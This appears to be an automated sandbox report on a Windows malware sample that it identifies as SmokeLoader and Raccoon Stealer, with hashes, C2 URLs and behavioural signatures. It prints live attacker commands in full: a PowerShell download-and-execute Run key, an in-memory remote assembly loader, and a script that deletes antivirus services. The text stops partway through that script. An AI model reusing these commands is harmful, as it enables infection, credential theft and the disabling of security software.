Analysis
-
max time kernel
152s -
max time network
151s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
13-08-2021 14:32
Static task
static1
Behavioral task
behavioral1
Sample
1bbe3a3f1efad030be690f626257483a.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
1bbe3a3f1efad030be690f626257483a.exe
Resource
win10v20210410
General
-
Target
1bbe3a3f1efad030be690f626257483a.exe
-
Size
180KB
-
MD5
1bbe3a3f1efad030be690f626257483a
-
SHA1
06d2221210b3ff3336a5dade2e43d689697e8002
-
SHA256
cce6188efa2820773071b644fec917c57d553da1d0f4571b7056b6aaf2f11249
-
SHA512
63f6f76b7181f2fd6f88e161c8cd5f99da2197e2845d382628a890099e3bd99e8a85a6d1981961ad01383da10995223ba030531cea3561afa0e3752a1d51cbf4
Malware Config
Extracted
http://193.56.146.55/Api/GetFile2
Extracted
smokeloader
2020
http://readinglistforjuly1.xyz/
http://readinglistforjuly2.xyz/
http://readinglistforjuly3.xyz/
http://readinglistforjuly4.xyz/
http://readinglistforjuly5.xyz/
http://readinglistforjuly6.xyz/
http://readinglistforjuly7.xyz/
http://readinglistforjuly8.xyz/
http://readinglistforjuly9.xyz/
http://readinglistforjuly10.xyz/
http://readinglistforjuly1.site/
http://readinglistforjuly2.site/
http://readinglistforjuly3.site/
http://readinglistforjuly4.site/
http://readinglistforjuly5.site/
http://readinglistforjuly6.site/
http://readinglistforjuly7.site/
http://readinglistforjuly8.site/
http://readinglistforjuly9.site/
http://readinglistforjuly10.site/
http://readinglistforjuly1.club/
http://readinglistforjuly2.club/
http://readinglistforjuly3.club/
http://readinglistforjuly4.club/
http://readinglistforjuly5.club/
http://readinglistforjuly6.club/
http://readinglistforjuly7.club/
http://readinglistforjuly8.club/
http://readinglistforjuly9.club/
http://readinglistforjuly10.club/
Extracted
raccoon
cd8dc1031358b1aec55cc6bc447df1018b068607
-
url4cnc
https://telete.in/jagressor_kz
Extracted
raccoon
471c70de3b4f9e4d493e418d1f60a90659057de0
-
url4cnc
https://telete.in/p1rosto100xx
Signatures
-
Raccoon Stealer Payload 5 IoCs
Processes:
resource yara_rule behavioral2/memory/1292-139-0x00000000048B0000-0x0000000004941000-memory.dmp family_raccoon behavioral2/memory/1292-140-0x0000000000400000-0x0000000002CA9000-memory.dmp family_raccoon behavioral2/memory/1300-220-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon behavioral2/memory/1300-221-0x000000000044003F-mapping.dmp family_raccoon behavioral2/memory/1300-233-0x0000000000400000-0x0000000000495000-memory.dmp family_raccoon -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 1928 created 1292 1928 WerFault.exe 8247.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 24 2884 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
7DFF.exe7F77.exe8247.exeRuntimebroker.exe7F77.exepid process 8 7DFF.exe 4088 7F77.exe 1292 8247.exe 3844 Runtimebroker.exe 1300 7F77.exe -
Deletes itself 1 IoCs
Processes:
pid process 2984 -
Drops startup file 1 IoCs
Processes:
Runtimebroker.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe -
Loads dropped DLL 1 IoCs
Processes:
7F77.exepid process 1300 7F77.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://193.56.146.55/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')" powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
1bbe3a3f1efad030be690f626257483a.exe7F77.exedescription pid process target process PID 3788 set thread context of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 4088 set thread context of 1300 4088 7F77.exe 7F77.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 18 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3924 8 WerFault.exe 7DFF.exe 3692 8 WerFault.exe 7DFF.exe 2788 8 WerFault.exe 7DFF.exe 2892 1292 WerFault.exe 8247.exe 2772 8 WerFault.exe 7DFF.exe 1964 1292 WerFault.exe 8247.exe 2128 8 WerFault.exe 7DFF.exe 3024 1292 WerFault.exe 8247.exe 3768 8 WerFault.exe 7DFF.exe 3272 1292 WerFault.exe 8247.exe 1928 1292 WerFault.exe 8247.exe 2336 3844 WerFault.exe Runtimebroker.exe 868 3844 WerFault.exe Runtimebroker.exe 1520 3844 WerFault.exe Runtimebroker.exe 4016 3844 WerFault.exe Runtimebroker.exe 212 3844 WerFault.exe Runtimebroker.exe 428 3844 WerFault.exe Runtimebroker.exe 3788 1300 WerFault.exe 7F77.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1bbe3a3f1efad030be690f626257483a.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1bbe3a3f1efad030be690f626257483a.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1bbe3a3f1efad030be690f626257483a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1bbe3a3f1efad030be690f626257483a.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
1bbe3a3f1efad030be690f626257483a.exepid process 2364 1bbe3a3f1efad030be690f626257483a.exe 2364 1bbe3a3f1efad030be690f626257483a.exe 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2984 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
1bbe3a3f1efad030be690f626257483a.exepid process 2364 1bbe3a3f1efad030be690f626257483a.exe 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 2984 -
Suspicious use of AdjustPrivilegeToken 39 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exepowershell.exe7F77.exepowershell.exeWerFault.exedescription pid process Token: SeDebugPrivilege 3692 WerFault.exe Token: SeDebugPrivilege 2788 WerFault.exe Token: SeDebugPrivilege 2892 WerFault.exe Token: SeDebugPrivilege 2772 WerFault.exe Token: SeDebugPrivilege 1964 WerFault.exe Token: SeDebugPrivilege 2128 WerFault.exe Token: SeDebugPrivilege 3024 WerFault.exe Token: SeDebugPrivilege 3768 WerFault.exe Token: SeDebugPrivilege 3272 WerFault.exe Token: SeDebugPrivilege 1928 WerFault.exe Token: SeDebugPrivilege 2336 WerFault.exe Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeDebugPrivilege 868 WerFault.exe Token: SeDebugPrivilege 1520 WerFault.exe Token: SeDebugPrivilege 4016 WerFault.exe Token: SeDebugPrivilege 212 WerFault.exe Token: SeDebugPrivilege 428 WerFault.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 4088 7F77.exe Token: SeDebugPrivilege 2336 powershell.exe Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeDebugPrivilege 3788 WerFault.exe Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 Token: SeShutdownPrivilege 2984 Token: SeCreatePagefilePrivilege 2984 -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 2984 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
1bbe3a3f1efad030be690f626257483a.exe7DFF.exeRuntimebroker.exe7F77.exedescription pid process target process PID 3788 wrote to memory of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 3788 wrote to memory of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 3788 wrote to memory of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 3788 wrote to memory of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 3788 wrote to memory of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 3788 wrote to memory of 2364 3788 1bbe3a3f1efad030be690f626257483a.exe 1bbe3a3f1efad030be690f626257483a.exe PID 2984 wrote to memory of 8 2984 7DFF.exe PID 2984 wrote to memory of 8 2984 7DFF.exe PID 2984 wrote to memory of 8 2984 7DFF.exe PID 2984 wrote to memory of 4088 2984 7F77.exe PID 2984 wrote to memory of 4088 2984 7F77.exe PID 2984 wrote to memory of 4088 2984 7F77.exe PID 2984 wrote to memory of 1292 2984 8247.exe PID 2984 wrote to memory of 1292 2984 8247.exe PID 2984 wrote to memory of 1292 2984 8247.exe PID 2984 wrote to memory of 1116 2984 explorer.exe PID 2984 wrote to memory of 1116 2984 explorer.exe PID 2984 wrote to memory of 1116 2984 explorer.exe PID 2984 wrote to memory of 1116 2984 explorer.exe PID 2984 wrote to memory of 3352 2984 explorer.exe PID 2984 wrote to memory of 3352 2984 explorer.exe PID 2984 wrote to memory of 3352 2984 explorer.exe PID 2984 wrote to memory of 3088 2984 explorer.exe PID 2984 wrote to memory of 3088 2984 explorer.exe PID 2984 wrote to memory of 3088 2984 explorer.exe PID 2984 wrote to memory of 3088 2984 explorer.exe PID 8 wrote to memory of 3844 8 7DFF.exe Runtimebroker.exe PID 8 wrote to memory of 3844 8 7DFF.exe Runtimebroker.exe PID 8 wrote to memory of 3844 8 7DFF.exe Runtimebroker.exe PID 2984 wrote to memory of 2220 2984 explorer.exe PID 2984 wrote to memory of 2220 2984 explorer.exe PID 2984 wrote to memory of 2220 2984 explorer.exe PID 2984 wrote to memory of 1216 2984 explorer.exe PID 2984 wrote to memory of 1216 2984 explorer.exe PID 2984 wrote to memory of 1216 2984 explorer.exe PID 2984 wrote to memory of 1216 2984 explorer.exe PID 2984 wrote to memory of 3592 2984 explorer.exe PID 2984 wrote to memory of 3592 2984 explorer.exe PID 2984 wrote to memory of 3592 2984 explorer.exe PID 2984 wrote to memory of 2744 2984 explorer.exe PID 2984 wrote to memory of 2744 2984 explorer.exe PID 2984 wrote to memory of 2744 2984 explorer.exe PID 2984 wrote to memory of 2744 2984 explorer.exe PID 2984 wrote to memory of 3400 2984 explorer.exe PID 2984 wrote to memory of 3400 2984 explorer.exe PID 2984 wrote to memory of 3400 2984 explorer.exe PID 2984 wrote to memory of 3004 2984 explorer.exe PID 2984 wrote to memory of 3004 2984 explorer.exe PID 2984 wrote to memory of 3004 2984 explorer.exe PID 2984 wrote to memory of 3004 2984 explorer.exe PID 3844 wrote to memory of 3544 3844 Runtimebroker.exe powershell.exe PID 3844 wrote to memory of 3544 3844 Runtimebroker.exe powershell.exe PID 3844 wrote to memory of 3544 3844 Runtimebroker.exe powershell.exe PID 3844 wrote to memory of 2884 3844 Runtimebroker.exe powershell.exe PID 3844 wrote to memory of 2884 3844 Runtimebroker.exe powershell.exe PID 3844 wrote to memory of 2884 3844 Runtimebroker.exe powershell.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe PID 4088 wrote to memory of 1300 4088 7F77.exe 7F77.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"C:\Users\Admin\AppData\Local\Temp\1bbe3a3f1efad030be690f626257483a.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7DFF.exeC:\Users\Admin\AppData\Local\Temp\7DFF.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 7882⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 8242⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 7602⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 9122⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 8282⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8 -s 9242⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 7323⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 7843⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 7643⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 7963⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 9923⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3844 -s 10163⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://193.56.146.55/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://193.56.146.55/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg64.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlls.dll" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlservice.exe" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge\rlvknlg.exe -boot" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles%\RelevantKnowledge" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add 